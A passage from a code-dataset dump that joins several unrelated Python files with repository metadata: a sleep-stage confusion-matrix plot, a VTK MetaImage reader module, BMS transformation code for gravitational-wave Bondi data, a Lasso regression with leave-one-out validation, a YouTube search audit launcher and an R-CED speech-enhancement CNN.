[0.02, 4.95, 1.03, 38.34, 1.18, ],
[0.03, 0.05, 0.11, 0.00, 42.01, ]])
cm_005b = np.array([[98.86, 0.18, 0.92, 0.00, 0.03, ],
[0.78, 95.09, 1.51, 2.61, 0.00, ],
[5.14, 0.31, 93.14, 1.36, 0.05, ],
[0.66, 19.90, 24.38, 55.06, 0.00, ],
[40.86, 2.15, 32.26, 0.00, 24.73, ]])
stages = ['Wake', 'REM', 'NREM', 'pre-REM', 'artifact']
letters = ['a', 'b', 'c', 'd', 'e', 'f']
def plot_confusion_matrix(cm, axis, labels_x=True, labels_y=True):
axis.imshow(cm, interpolation='nearest', cmap=plt.cm.Blues)
# we want to show all ticks...
axis.set(xticks=np.arange(cm.shape[1]),
yticks=np.arange(cm.shape[0]),
# ... and label them with the respective stages
xticklabels=stages, yticklabels=stages,
# title=title,
ylabel='true sleep stages' if labels_y else '',
xlabel='predicted sleep stages' if labels_x else '')
axis.set_ylim([cm.shape[0] - 0.5, -0.5])
# rotate the tick labels and set their alignment.
plt.setp(axis.get_xticklabels(), rotation=45, ha='right', rotation_mode='anchor')
# loop over data dimensions and create text annotations.
fmt = '.1%'
thresh = cm.max() / 2.
for i in range(cm.shape[0]):
for j in range(cm.shape[1]):
axis.text(j, i, format(cm[i, j], fmt), ha='center', va='center',
color='white' if cm[i, j] > thresh else 'black')
plt.rcParams.update({'font.size': 12})
fig, axes = plt.subplots(1, 2, sharex='all', sharey='all', figsize=(8, 5))
axes = axes.flatten()
# for i, (ax, data) in enumerate(zip(axes, [cmT_001, cm_001, cmT_001b, cm_001b])):
for i, (ax, data, letter) in enumerate(zip(axes, [cmT_001, cm_001], letters)):
data /= 100.
plot_confusion_matrix(data, ax, i <= 2, i % 2 == 0)
ax.text(0.5, 1.05, f'{letter})',
horizontalalignment='center',
verticalalignment='center',
transform=ax.transAxes)
# save plots
fig.tight_layout()
plt.savefig(join(dirname(__file__), '../../..', 'results', 'plots', 'paper', 'cm_8_conv.svg'))
plt.show()
| 41.5875 | 94 | 0.500751 |
5a0c1b45cde15999d4500fef4ce5b1b91c51b6ce | 2,082 | py | Python | modules/readers/metaImageRDR.py | chrisidefix/devide | 99bfe156e710fa47ba7ae88b0ce1eef592a3a439 | [
"BSD-3-Clause"
] | 25 | 2015-08-24T16:05:14.000Z | 2020-12-09T20:07:14.000Z | modules/readers/metaImageRDR.py | chrisidefix/devide | 99bfe156e710fa47ba7ae88b0ce1eef592a3a439 | [
"BSD-3-Clause"
] | 1 | 2016-02-16T21:18:10.000Z | 2016-02-16T21:18:10.000Z | modules/readers/metaImageRDR.py | chrisidefix/devide | 99bfe156e710fa47ba7ae88b0ce1eef592a3a439 | [
"BSD-3-Clause"
] | 5 | 2016-02-16T20:05:37.000Z | 2020-01-31T11:27:39.000Z | # $Id$
from module_base import ModuleBase
from module_mixins import ScriptedConfigModuleMixin
import module_utils
import vtk
import wx
class metaImageRDR(ScriptedConfigModuleMixin, ModuleBase):
def __init__(self, module_manager):
ModuleBase.__init__(self, module_manager)
self._reader = vtk.vtkMetaImageReader()
module_utils.setup_vtk_object_progress(self, self._reader,
'Reading MetaImage data.')
self._config.filename = ''
configList = [
('File name:', 'filename', 'base:str', 'filebrowser',
'The name of the MetaImage file you want to load.',
{'fileMode' : wx.OPEN,
'fileMask' :
'MetaImage single file (*.mha)|*.mha|MetaImage separate header '
'(*.mhd)|*.mhd|All files (*.*)|*.*'})]
ScriptedConfigModuleMixin.__init__(
self, configList,
{'Module (self)' : self,
'vtkMetaImageReader' : self._reader})
self.sync_module_logic_with_config()
def close(self):
# we play it safe... (the graph_editor/module_manager should have
# disconnected us by now)
for input_idx in range(len(self.get_input_descriptions())):
self.set_input(input_idx, None)
# this will take care of all display thingies
ScriptedConfigModuleMixin.close(self)
ModuleBase.close(self)
# get rid of our reference
del self._reader
def get_input_descriptions(self):
return ()
def set_input(self, idx, inputStream):
raise Exception
def get_output_descriptions(self):
return ('vtkImageData',)
def get_output(self, idx):
return self._reader.GetOutput()
def logic_to_config(self):
self._config.filename = self._reader.GetFileName()
def config_to_logic(self):
self._reader.SetFileName(self._config.filename)
def execute_module(self):
self._reader.Update()
| 27.038961 | 78 | 0.605668 |
47e03dca5b82faa6612c31956bed14574a14c299 | 21,941 | py | Python | scri/asymptotic_bondi_data/transformations.py | akhairna/scri | 3b7f307d19ef303914cef2fa088ee750ef8533c2 | [
"MIT"
] | null | null | null | scri/asymptotic_bondi_data/transformations.py | akhairna/scri | 3b7f307d19ef303914cef2fa088ee750ef8533c2 | [
"MIT"
] | null | null | null | scri/asymptotic_bondi_data/transformations.py | akhairna/scri | 3b7f307d19ef303914cef2fa088ee750ef8533c2 | [
"MIT"
] | null | null | null | import math
import numpy as np
import quaternion
import spinsfast
import spherical_functions as sf
def _process_transformation_kwargs(input_ell_max, **kwargs):
original_kwargs = kwargs.copy()
# Build the supertranslation and spacetime_translation arrays
supertranslation = np.zeros((4,), dtype=complex) # For now; may be resized below
ell_max_supertranslation = 1 # For now; may be increased below
if "supertranslation" in kwargs:
supertranslation = np.array(kwargs.pop("supertranslation"), dtype=complex)
if supertranslation.dtype != "complex" and supertranslation.size > 0:
# I don't actually think this can ever happen...
raise TypeError(
"Input argument `supertranslation` should be a complex array with size>0. "
f"Got a {supertranslation.dtype} array of shape {supertranslation.shape}"
)
# Make sure the array has size at least 4, by padding with zeros
if supertranslation.size <= 4:
supertranslation = np.lib.pad(
supertranslation, (0, 4 - supertranslation.size), "constant", constant_values=(0.0,)
)
# Check that the shape is a possible array of scalar modes with complete (ell,m) data
ell_max_supertranslation = int(np.sqrt(len(supertranslation))) - 1
if (ell_max_supertranslation + 1) ** 2 != len(supertranslation):
raise ValueError(
"Input supertranslation parameter must contain modes from ell=0 up to some ell_max, "
"including\n all relevant m modes in standard order (see `spherical_functions` "
"documentation for details).\n Thus, it must be an array with length given by a "
"perfect square; its length is {len(supertranslation)}"
)
# Check that the resulting supertranslation will be real
for ell in range(ell_max_supertranslation + 1):
for m in range(ell + 1):
i_pos = sf.LM_index(ell, m, 0)
i_neg = sf.LM_index(ell, -m, 0)
a = supertranslation[i_pos]
b = supertranslation[i_neg]
if abs(a - (-1.0) ** m * b.conjugate()) > 3e-16 + 1e-15 * abs(b):
raise ValueError(
f"\nsupertranslation[{i_pos}]={a} # (ell,m)=({ell},{m})\n"
+ "supertranslation[{}]={} # (ell,m)=({},{})\n".format(i_neg, b, ell, -m)
+ "Will result in an imaginary supertranslation."
)
spacetime_translation = np.zeros((4,), dtype=float)
spacetime_translation[0] = sf.constant_from_ell_0_mode(supertranslation[0]).real
spacetime_translation[1:4] = -sf.vector_from_ell_1_modes(supertranslation[1:4]).real
if "spacetime_translation" in kwargs:
st_trans = np.array(kwargs.pop("spacetime_translation"), dtype=float)
if st_trans.shape != (4,) or st_trans.dtype != "float":
raise TypeError(
"\nInput argument `spacetime_translation` should be a float array of shape (4,).\n"
"Got a {} array of shape {}.".format(st_trans.dtype, st_trans.shape)
)
spacetime_translation = st_trans[:]
supertranslation[0] = sf.constant_as_ell_0_mode(spacetime_translation[0])
supertranslation[1:4] = sf.vector_as_ell_1_modes(-spacetime_translation[1:4])
if "space_translation" in kwargs:
s_trans = np.array(kwargs.pop("space_translation"), dtype=float)
if s_trans.shape != (3,) or s_trans.dtype != "float":
raise TypeError(
"\nInput argument `space_translation` should be an array of floats of shape (3,).\n"
"Got a {} array of shape {}.".format(s_trans.dtype, s_trans.shape)
)
spacetime_translation[1:4] = s_trans[:]
supertranslation[1:4] = sf.vector_as_ell_1_modes(-spacetime_translation[1:4])
if "time_translation" in kwargs:
t_trans = kwargs.pop("time_translation")
if not isinstance(t_trans, float):
raise TypeError("Input argument `time_translation` should be a single float. " f"Got {t_trans}")
spacetime_translation[0] = t_trans
supertranslation[0] = sf.constant_as_ell_0_mode(spacetime_translation[0])
# Decide on the number of points to use in each direction. A nontrivial supertranslation will
# introduce power in higher modes, so for best accuracy, we need to account for that. But we'll
# make it a firm requirement to have enough points to capture the original waveform, at least
output_ell_max = kwargs.pop("output_ell_max", input_ell_max)
working_ell_max = kwargs.pop("working_ell_max", 2 * input_ell_max + ell_max_supertranslation)
if working_ell_max < input_ell_max:
raise ValueError(f"working_ell_max={working_ell_max} is too small; it must be at least ell_max={input_ell_max}")
# Get the rotor for the frame rotation
frame_rotation = np.quaternion(*np.array(kwargs.pop("frame_rotation", [1, 0, 0, 0]), dtype=float))
if frame_rotation.abs() < 3e-16:
raise ValueError(f"frame_rotation={frame_rotation} should be a single unit quaternion")
frame_rotation = frame_rotation.normalized()
# Get the boost velocity vector
boost_velocity = np.array(kwargs.pop("boost_velocity", [0.0] * 3), dtype=float)
beta = np.linalg.norm(boost_velocity)
if boost_velocity.dtype != float or boost_velocity.shape != (3,) or beta >= 1.0:
raise ValueError(
f"Input boost_velocity=`{boost_velocity}` should be a 3-vector with " "magnitude strictly less than 1.0"
)
return frame_rotation, boost_velocity, supertranslation, working_ell_max, output_ell_max
def boosted_grid(frame_rotation, boost_velocity, n_theta, n_phi):
beta = np.linalg.norm(boost_velocity)
gamma = 1 / math.sqrt(1 - beta ** 2)
rapidity = math.atanh(beta)
# Construct the function that modifies our rotor grid to account for the boost
if beta > 3e-14: # Tolerance for beta; any smaller and numerical errors will have greater effect
vhat = boost_velocity / beta
def Bprm_j_k(thetaprm, phiprm):
"""Construct rotor taking r' to r
I derived this result in a different way, but I've also found it described in
Penrose-Rindler Vol. 1, around Eq. (1.3.5). Note, however, that their discussion is for
the past celestial sphere, so there's a sign difference.
"""
# Note: It doesn't matter which we use -- r' or r; all we need is the direction of the
# bivector spanned by v and r', which is the same as the direction of the bivector
# spanned by v and r, since either will be normalized, and one cross product is zero iff
# the other is zero.
rprm = np.array(
[math.cos(phiprm) * math.sin(thetaprm), math.sin(phiprm) * math.sin(thetaprm), math.cos(thetaprm)]
)
Thetaprm = math.acos(np.dot(vhat, rprm))
Theta = 2 * math.atan(math.exp(-rapidity) * math.tan(Thetaprm / 2.0))
rprm_cross_vhat = np.quaternion(0.0, *np.cross(rprm, vhat))
if rprm_cross_vhat.abs() > 1e-200:
return (rprm_cross_vhat.normalized() * (Thetaprm - Theta) / 2).exp()
else:
return quaternion.one
else:
def Bprm_j_k(thetaprm, phiprm):
return quaternion.one
# These are the angles in the transformed system at which we need to know the function values
thetaprm_phiprm = sf.theta_phi(n_theta, n_phi)
# Set up rotors that we can use to evaluate the SWSHs in the original frame
R_j_k = np.empty((n_theta, n_phi), dtype=np.quaternion)
for j in range(n_theta):
for k in range(n_phi):
thetaprm_j, phiprm_k = thetaprm_phiprm[j, k]
R_j_k[j, k] = (
Bprm_j_k(thetaprm_j, phiprm_k) * frame_rotation * quaternion.from_spherical_coords(thetaprm_j, phiprm_k)
)
return R_j_k
def conformal_factors(boost_velocity, distorted_grid_rotors):
"""Compute various combinations of the conformal factor
This is primarily a utility function for use in the `transform` function, pulled out so that it
can be tested separately.
Parameters
==========
boost_velocity: array of 3 floats
Three-velocity of the new frame relative to the old frame
distorted_grid_rotors: 2-d array of quaternions
Unit quaternions giving the rotation of the (x, y, z) basis onto the basis vectors with
respect to which the output spin-weighted fields are evaluated
Returns
=======
k: spherical_functions.Grid
ðk_over_k: spherical_functions.Grid
one_over_k: spherical_functions.Grid
one_over_k_cubed: spherical_functions.Grid
These all have the same shape as `distorted_grid_rotors` except for an additional dimension
of size 1 at the beginning, so that they can broadcast against the time dimension.
"""
from quaternion import rotate_vectors
β = np.linalg.norm(boost_velocity)
γ = 1 / math.sqrt(1 - β ** 2)
# Note that ðk / k = ð(v·r) / (1 - v·r), but evaluating ð(v·r) is slightly delicate. As modes
# in the undistorted frame, we have ð(v·r) ~ (v·r), but the right hand side is now an s=1 field,
# so it has to be evaluated as such.
v_dot_r = sf.Grid(np.dot(rotate_vectors(distorted_grid_rotors, quaternion.z.vec), boost_velocity), spin_weight=0)[
np.newaxis, :, :
]
ðv_dot_r = sf.Grid(
sf.Modes(np.insert(sf.vector_as_ell_1_modes(boost_velocity), 0, 0.0), spin_weight=1).evaluate(
distorted_grid_rotors
),
spin_weight=1,
)[np.newaxis, :, :]
one_over_k = γ * (1 - v_dot_r)
k = 1.0 / one_over_k
ðk_over_k = ðv_dot_r / (1 - v_dot_r)
one_over_k_cubed = one_over_k ** 3
return k, ðk_over_k, one_over_k, one_over_k_cubed
def transform(self, **kwargs):
"""Apply BMS transformation to AsymptoticBondiData object
It is important to note that the input transformation parameters are applied in this order:
1. (Super)Translations
2. Rotation (about the origin)
3. Boost (about the origin)
All input parameters refer to the transformation required to take the input data's inertial
frame onto the inertial frame of the output data's inertial observers. In what follows, the
coordinates of and functions in the input inertial frame will be unprimed, while corresponding
values of the output inertial frame will be primed.
The translations (space, time, spacetime, or super) can be given in various ways, which may
override each other. Ultimately, however, they are essentially combined into a single function
`α`, representing the supertranslation, which transforms the asymptotic time variable `u` as
u'(u, θ, ϕ) = u(u, θ, ϕ) - α(θ, ϕ)
A simple time translation by δt would correspond to
α(θ, ϕ) = δt # Independent of (θ, ϕ)
A pure spatial translation δx would correspond to
α(θ, ϕ) = -δx · n̂(θ, ϕ)
where `·` is the usual dot product, and `n̂` is the unit vector in the given direction.
Parameters
==========
abd: AsymptoticBondiData
The object storing the modes of the original data, which will be transformed in this
function. This is the only required argument to this function.
time_translation: float, optional
Defaults to zero. Nonzero overrides corresponding components of `spacetime_translation` and
`supertranslation` parameters. Note that this is the actual change in the coordinate value,
rather than the corresponding mode weight (which is what `supertranslation` represents).
space_translation : float array of length 3, optional
Defaults to empty (no translation). Non-empty overrides corresponding components of
`spacetime_translation` and `supertranslation` parameters. Note that this is the actual
change in the coordinate value, rather than the corresponding mode weight (which is what
`supertranslation` represents).
spacetime_translation : float array of length 4, optional
Defaults to empty (no translation). Non-empty overrides corresponding components of
`supertranslation`. Note that this is the actual change in the coordinate value, rather
than the corresponding mode weight (which is what `supertranslation` represents).
supertranslation : complex array [defaults to 0]
This gives the complex components of the spherical-harmonic expansion of the
supertranslation in standard form, starting from ell=0 up to some ell_max, which may be
different from the ell_max of the input `abd` object. Supertranslations must be real, so
these values should obey the condition
α^{ℓ,m} = (-1)^m ᾱ^{ℓ,-m}
This condition is actually imposed on the input data, so imaginary parts of α(θ, ϕ) will
essentially be discarded. Defaults to empty, which causes no supertranslation. Note that
some components may be overridden by the parameters above.
frame_rotation : quaternion [defaults to 1]
Transformation applied to (x,y,z) basis of the input mode's inertial frame. For example,
the basis z vector of the new frame may be written as
z' = frame_rotation * z * frame_rotation.inverse()
Defaults to 1, corresponding to the identity transformation (no rotation).
boost_velocity : float array of length 3 [defaults to (0, 0, 0)]
This is the three-velocity vector of the new frame relative to the input frame. The norm of
this vector is required to be smaller than 1.
output_ell_max: int [defaults to abd.ell_max]
Maximum ell value in the output data.
working_ell_max: int [defaults to 2 * abd.ell_max]
Maximum ell value to use during the intermediate calculations. Rotations and time
translations do not require this to be any larger than abd.ell_max, but other
transformations will require more values of ell for accurate results. In particular, boosts
are multiplied by time, meaning that a large boost of data with large values of time will
lead to very large power in higher modes. Similarly, large (super)translations will couple
power through a lot of modes. To avoid aliasing, this value should be large, to accomodate
power in higher modes.
Returns
-------
abdprime: AsymptoticBondiData
Object representing the transformed data.
"""
from quaternion import rotate_vectors
from scipy.interpolate import CubicSpline
# Parse the input arguments, and define the basic parameters for this function
frame_rotation, boost_velocity, supertranslation, working_ell_max, output_ell_max, = _process_transformation_kwargs(
self.ell_max, **kwargs
)
n_theta = 2 * working_ell_max + 1
n_phi = n_theta
β = np.linalg.norm(boost_velocity)
γ = 1 / math.sqrt(1 - β ** 2)
# Make this into a Modes object, so it can keep track of its spin weight, etc., through the
# various operations needed below.
supertranslation = sf.Modes(supertranslation, spin_weight=0).real
# This is a 2-d array of unit quaternions, which are what the spin-weighted functions should be
# evaluated on (even for spin 0 functions, for simplicity). That will be equivalent to
# evaluating the spin-weighted functions with respect to the transformed grid -- although on the
# original time slices.
distorted_grid_rotors = boosted_grid(frame_rotation, boost_velocity, n_theta, n_phi)
# Compute u, α, ðα, ððα, k, ðk/k, 1/k, and 1/k³ on the distorted grid, including new axes to
# enable broadcasting with time-dependent functions. Note that the first axis should represent
# variation in u, the second axis variation in θ', and the third axis variation in ϕ'.
u = self.u
α = sf.Grid(supertranslation.evaluate(distorted_grid_rotors), spin_weight=0).real[np.newaxis, :, :]
# The factors of 1/sqrt(2) and 1/2 come from using the GHP eth instead of the NP eth.
ðα = sf.Grid(supertranslation.eth.evaluate(distorted_grid_rotors)/np.sqrt(2), spin_weight=α.s + 1)[np.newaxis, :, :]
ððα = sf.Grid(0.5*supertranslation.eth.eth.evaluate(distorted_grid_rotors), spin_weight=α.s + 2)[np.newaxis, :, :]
k, ðk_over_k, one_over_k, one_over_k_cubed = conformal_factors(boost_velocity, distorted_grid_rotors)
# ðu'(u, θ', ϕ') exp(iλ) / k(θ', ϕ')
ðuprime_over_k = ðk_over_k * (u - α) - ðα
# ψ0(u, θ', ϕ') exp(2iλ)
ψ0 = sf.Grid(self.psi0.evaluate(distorted_grid_rotors), spin_weight=2)
# ψ1(u, θ', ϕ') exp(iλ)
ψ1 = sf.Grid(self.psi1.evaluate(distorted_grid_rotors), spin_weight=1)
# ψ2(u, θ', ϕ')
ψ2 = sf.Grid(self.psi2.evaluate(distorted_grid_rotors), spin_weight=0)
# ψ3(u, θ', ϕ') exp(-1iλ)
ψ3 = sf.Grid(self.psi3.evaluate(distorted_grid_rotors), spin_weight=-1)
# ψ4(u, θ', ϕ') exp(-2iλ)
ψ4 = sf.Grid(self.psi4.evaluate(distorted_grid_rotors), spin_weight=-2)
# σ(u, θ', ϕ') exp(2iλ)
σ = sf.Grid(self.sigma.evaluate(distorted_grid_rotors), spin_weight=2)
### The following calculations are done using in-place Horner form. I suspect this will be the
### most efficient form of this calculation, within reason. Note that the factors of exp(isλ)
### were computed automatically by evaluating in terms of quaternions.
#
fprime_of_timenaught_directionprime = np.empty((6, self.n_times, n_theta, n_phi), dtype=complex)
# ψ0'(u, θ', ϕ')
fprime_temp = ψ4.copy()
fprime_temp *= ðuprime_over_k
fprime_temp += -4 * ψ3
fprime_temp *= ðuprime_over_k
fprime_temp += 6 * ψ2
fprime_temp *= ðuprime_over_k
fprime_temp += -4 * ψ1
fprime_temp *= ðuprime_over_k
fprime_temp += ψ0
fprime_temp *= one_over_k_cubed
fprime_of_timenaught_directionprime[0] = fprime_temp
# ψ1'(u, θ', ϕ')
fprime_temp = -ψ4
fprime_temp *= ðuprime_over_k
fprime_temp += 3 * ψ3
fprime_temp *= ðuprime_over_k
fprime_temp += -3 * ψ2
fprime_temp *= ðuprime_over_k
fprime_temp += ψ1
fprime_temp *= one_over_k_cubed
fprime_of_timenaught_directionprime[1] = fprime_temp
# ψ2'(u, θ', ϕ')
fprime_temp = ψ4.copy()
fprime_temp *= ðuprime_over_k
fprime_temp += -2 * ψ3
fprime_temp *= ðuprime_over_k
fprime_temp += ψ2
fprime_temp *= one_over_k_cubed
fprime_of_timenaught_directionprime[2] = fprime_temp
# ψ3'(u, θ', ϕ')
fprime_temp = -ψ4
fprime_temp *= ðuprime_over_k
fprime_temp += ψ3
fprime_temp *= one_over_k_cubed
fprime_of_timenaught_directionprime[3] = fprime_temp
# ψ4'(u, θ', ϕ')
fprime_temp = ψ4.copy()
fprime_temp *= one_over_k_cubed
fprime_of_timenaught_directionprime[4] = fprime_temp
# σ'(u, θ', ϕ')
fprime_temp = σ.copy()
fprime_temp -= ððα
fprime_temp *= one_over_k
fprime_of_timenaught_directionprime[5] = fprime_temp
# Determine the new time slices. The set timeprime is chosen so that on each slice of constant
# u'_i, the average value of u=(u'/k)+α is precisely <u>=u'γ+<α>=u_i. But then, we have to
# narrow that set down, so that every grid point on all the u'_i' slices correspond to data in
# the range of input data.
timeprime = (u - sf.constant_from_ell_0_mode(supertranslation[0]).real) / γ
timeprime_of_initialtime_directionprime = k * (u[0] - α)
timeprime_of_finaltime_directionprime = k * (u[-1] - α)
earliest_complete_timeprime = np.max(timeprime_of_initialtime_directionprime.view(np.ndarray))
latest_complete_timeprime = np.min(timeprime_of_finaltime_directionprime.view(np.ndarray))
timeprime = timeprime[(timeprime >= earliest_complete_timeprime) & (timeprime <= latest_complete_timeprime)]
# This will store the values of f'(u', θ', ϕ') for the various functions `f`
fprime_of_timeprime_directionprime = np.zeros((6, timeprime.size, n_theta, n_phi), dtype=complex)
# Interpolate the various transformed function values on the transformed grid from the original
# time coordinate to the new set of time coordinates, independently for each direction.
for i in range(n_theta):
for j in range(n_phi):
k_i_j = k[0, i, j]
α_i_j = α[0, i, j]
# u'(u, θ', ϕ')
timeprime_of_timenaught_directionprime_i_j = k_i_j * (u - α_i_j)
# f'(u', θ', ϕ')
fprime_of_timeprime_directionprime[:, :, i, j] = CubicSpline(
timeprime_of_timenaught_directionprime_i_j, fprime_of_timenaught_directionprime[:, :, i, j], axis=1
)(timeprime)
# Finally, transform back from the distorted grid to the SWSH mode weights as measured in that
# grid. I'll abuse notation slightly here by indicating those "distorted" mode weights with
# primes, so that f'(u')_{ℓ', m'} = ∫ f'(u', θ', ϕ') sȲ_{ℓ', m'}(θ', ϕ') sin(θ') dθ' dϕ'
abdprime = type(self)(timeprime, output_ell_max)
# ψ0'(u')_{ℓ', m'}
abdprime.psi0 = spinsfast.map2salm(fprime_of_timeprime_directionprime[0], 2, output_ell_max)
# ψ1'(u')_{ℓ', m'}
abdprime.psi1 = spinsfast.map2salm(fprime_of_timeprime_directionprime[1], 1, output_ell_max)
# ψ2'(u')_{ℓ', m'}
abdprime.psi2 = spinsfast.map2salm(fprime_of_timeprime_directionprime[2], 0, output_ell_max)
# ψ3'(u')_{ℓ', m'}
abdprime.psi3 = spinsfast.map2salm(fprime_of_timeprime_directionprime[3], -1, output_ell_max)
# ψ4'(u')_{ℓ', m'}
abdprime.psi4 = spinsfast.map2salm(fprime_of_timeprime_directionprime[4], -2, output_ell_max)
# σ'(u')_{ℓ', m'}
abdprime.sigma = spinsfast.map2salm(fprime_of_timeprime_directionprime[5], 2, output_ell_max)
return abdprime
| 51.025581 | 120 | 0.675995 |
56aef9f2caa5da1995f4cc5db7b227a6ada7a1f1 | 1,426 | py | Python | question3.py | LucasHaug/PCS3438 | 8e33d9480d0327e9ff3cac406fb1db373a20ca6e | [
"MIT"
] | null | null | null | question3.py | LucasHaug/PCS3438 | 8e33d9480d0327e9ff3cac406fb1db373a20ca6e | [
"MIT"
] | null | null | null | question3.py | LucasHaug/PCS3438 | 8e33d9480d0327e9ff3cac406fb1db373a20ca6e | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
"""Lasso Regression
Train a Lasso regression, with alpha = 1 and using the leave
one out method for cross validation. The data used to train
and test the regression is the data from the reg01.csv file.
File
-------
question3.py
Author
-------
Lucas Haug <[email protected]>
"""
from data import get_data
from sklearn.linear_model import Lasso
from sklearn.metrics import mean_squared_error
from sklearn.model_selection import LeaveOneOut
import numpy as np
def main():
x_data, y_data = get_data("data/reg01.csv")
cv = LeaveOneOut()
rmse_train = []
rmse_test = []
for train_index, test_index in cv.split(x_data):
# Split data
x_train, x_test = x_data[train_index, :], x_data[test_index, :]
y_train, y_test = y_data[train_index], y_data[test_index]
# Fit model
model = Lasso(alpha=1.0)
model.fit(x_train, y_train)
# Evaluate model
train_predict = model.predict(x_train)
test_predict = model.predict(x_test)
# Calculate rmse
rmse_train.append(mean_squared_error(y_train, train_predict, squared=False))
rmse_test.append(mean_squared_error(y_test, test_predict, squared=False))
print("Root Mean Squared Errors:")
print(f"Mean Train RMSE: {np.mean(rmse_train) : .2f}")
print(f"Mean Test RMSE: {np.mean(rmse_test) : .2f}")
if __name__ == "__main__":
main()
| 25.017544 | 84 | 0.679523 |
d989ad5e6cb3ff4525ade53c3e072690dd4702f6 | 664 | py | Python | youtubeauditframework/perform_audit_youtube_search.py | kinit-sk/pseudoscience-paper | 93a50b623dcca82d9281fd472e1f0c13a5b9c7a8 | [
"MIT"
] | 1 | 2021-05-13T12:08:43.000Z | 2021-05-13T12:08:43.000Z | youtubeauditframework/perform_audit_youtube_search.py | kinit-sk/pseudoscience-paper | 93a50b623dcca82d9281fd472e1f0c13a5b9c7a8 | [
"MIT"
] | null | null | null | youtubeauditframework/perform_audit_youtube_search.py | kinit-sk/pseudoscience-paper | 93a50b623dcca82d9281fd472e1f0c13a5b9c7a8 | [
"MIT"
] | 1 | 2021-09-04T01:28:38.000Z | 2021-09-04T01:28:38.000Z | #!/usr/bin/python
import sys
from modules.YouTubeSearch import YouTubeSearchAudit
import os
os.chdir('../')
"""
Initialize variables
"""
# Read User Profile
USER_PROFILE = sys.argv[1]
# Read Search Term
# TODO: Make sure that you replace spaces ' ' with '_' when providing the search term to this script
# E.g., flat earth -> flat_earth
SEARCH_TERM = sys.argv[2].replace('_', ' ').lower()
"""
Create a YouTube Search Audit object for the given User
"""
YOUTUBE_SEARCH_AUDIT_MODULE = YouTubeSearchAudit(user_profile=USER_PROFILE, search_term=SEARCH_TERM)
# Start YouTube Search Audit Experiment
YOUTUBE_SEARCH_AUDIT_MODULE.perform_audit()
sys.exit(0)
| 23.714286 | 100 | 0.75 |
eb28e4d341215039d8e158bdb8efe91a0d472303 | 4,988 | py | Python | models/rced.py | wangkenpu/rsrgan | 0efafbdb4008becd3a81650ca0237c660e976d4a | [
"MIT"
] | 66 | 2018-07-06T07:07:56.000Z | 2021-07-30T07:59:54.000Z | models/rced.py | wangkenpu/rsrgan | 0efafbdb4008becd3a81650ca0237c660e976d4a | [
"MIT"
] | 7 | 2018-09-01T03:03:14.000Z | 2019-11-04T10:51:04.000Z | models/rced.py | wangkenpu/rsrgan | 0efafbdb4008becd3a81650ca0237c660e976d4a | [
"MIT"
] | 15 | 2018-07-03T13:47:26.000Z | 2021-10-17T04:26:13.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2017 Ke Wang
"""Redundant Convolutional Encoder Decoder (R-CED)
A fully convolutional neural network for speech enhancement(https://arxiv.org/pdf/1609.07132).
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import tensorflow as tf
from tensorflow.contrib.layers import xavier_initializer, l2_regularizer
from tensorflow.contrib.layers import batch_norm, fully_connected
class RCED(object):
def __init__(self, rced):
self.rced = rced
def __call__(self, inputs, labels, reuse=False):
"""Build CNN models. On first pass will make vars."""
self.inputs = inputs
self.labels = labels
outputs = self.infer(reuse)
return outputs
def infer(self, reuse):
rced = self.rced
activation_fn = tf.nn.relu
is_training = True
input_dim = rced.input_dim
left_context = rced.left_context
right_context = rced.right_context
splice_dim = left_context + 1 + right_context
in_dims = self.inputs.get_shape().as_list()
if len(in_dims) == 2:
# shape format [batch, width]
dims = self.inputs.get_shape().as_list()
assert dims[0] == rced.batch_size
inputs = tf.reshape(self.inputs, [dims[0], splice_dim, input_dim])
inputs = tf.expand_dims(inputs, -1)
elif len(in_dims) == 3:
# shape format [batch, length, width]
dims = self.inputs.get_shape().as_list()
assert dims[0] == 1
inputs = tf.squeeze(self.inputs, [0])
inputs = tf.reshape(self.inputs, [-1, splice_dim, input_dim])
inputs = tf.expand_dims(inputs, -1)
# If test of cv , BN should use global mean / stddev
if rced.cross_validation:
is_training = False
with tf.variable_scope('g_model') as scope:
if reuse:
scope.reuse_variables()
if rced.batch_norm:
normalizer_fn = batch_norm
normalizer_params = {
"is_training": is_training,
"scale": True,
"renorm": True
}
else:
normalizer_fn = None
normalizer_params = None
if rced.l2_scale > 0.0 and is_training:
weights_regularizer = l2_regularizer(rced.l2_scale)
else:
weights_regularizer = None
keep_prob = 1.0
if not reuse:
print("*** Generator summary ***")
print("G inputs shape: {}".format(inputs.get_shape()))
# inputs format [batch, in_height, in_width, in_channels]
# filters format [filter_height, filter_width, in_channels, out_channels]
filters_num = [12, 16, 20, 24, 32, 24, 20, 16, 12]
filters_width = [13, 11, 9, 7, 7, 7, 9, 11, 13]
assert len(filters_num) == len(filters_num)
for i in range(len(filters_num)):
inputs = tf.contrib.layers.conv2d(inputs, filters_num[i],
[splice_dim, filters_width[i]],
activation_fn=activation_fn,
normalizer_fn=normalizer_fn,
normalizer_params=normalizer_params,
weights_initializer=xavier_initializer(),
weights_regularizer=weights_regularizer,
biases_initializer=tf.zeros_initializer())
if not reuse:
print("Conv{} layer output shape: {}".format(
i+1, inputs.get_shape()), end=" *** ")
self.nnet_info(normalizer_fn, rced.keep_prob, weights_regularizer)
# Linear output
# inputs = tf.reshape(inputs, [rced.batch_size, -1])
inputs = tf.reshape(inputs, [-1, splice_dim * input_dim * filters_num[-1]])
y = fully_connected(inputs, rced.output_dim,
activation_fn=None,
weights_initializer=xavier_initializer(),
weights_regularizer=weights_regularizer,
biases_initializer=tf.constant_initializer(0.1))
if not reuse:
print("G output shape: {}".format(y.get_shape()))
sys.stdout.flush()
return y
def nnet_info(self, batch_norm, keep_prob, weights_regularizer):
if batch_norm is not None:
print("use batch normalization", end=" *** ")
if keep_prob != 1.0:
print("keep prob is {}".format(keep_prob),
end=" *** ")
if weights_regularizer is not None:
print("L2 regularizer scale is {}".format(self.rced.l2_scale),
end=" *** ")
print()
| 37.787879 | 94 | 0.558941 |
0ab8213d0daa1a1d193806451a93bd00fd587fc8 | 192 | py | Python | class-notes/renshu_mondai/ex2-r.py | rhoenkelevra/python_simple_applications | 28ceb5f9fe7ecf11d606d49463385e92927e8f98 | [
"MIT"
] | null | null | null | class-notes/renshu_mondai/ex2-r.py | rhoenkelevra/python_simple_applications | 28ceb5f9fe7ecf11d606d49463385e92927e8f98 | [
"MIT"
